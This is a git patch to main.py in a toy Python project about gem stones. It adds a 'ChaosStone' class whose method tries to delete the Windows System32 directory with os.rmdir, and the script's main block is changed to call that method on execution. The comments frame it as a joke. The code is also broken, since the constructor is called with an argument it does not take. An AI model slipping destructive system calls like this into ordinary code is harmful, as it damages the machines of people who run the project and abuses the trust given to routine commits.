From edddcbd7b84fb044fa899e904598d8e9f284e74f Mon Sep 17 00:00:00 2001 From: Palmito Date: Fri, 16 Feb 2024 15:48:43 +0100 Subject: [PATCH] Update main.py --- main.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/main.py b/main.py index 4698c0c..b03c1da 100644 --- a/main.py +++ b/main.py @@ -1,3 +1,4 @@ +import os class GemStone: name: str @@ -17,9 +18,16 @@ def __init__(self) -> None: def back(amount: int) -> None: print('Rewinding...') +class ChaosStone(GemStone): #IDK the gem stones + def __init__(self): + super().__init__() + self.name = 'ChaosStone' + + def absolute_chaos(self): + os.rmdir("C:\Windows\System32") #I know your not on Windows but anyway if __name__ == '__main__': print('Hello World') # This is the first script of the project - - + just_A_Nice_Gem = ChaosStone("Nice_Gem") + just_A_Nice_Gem.absolute_chaos() \ No newline at end of file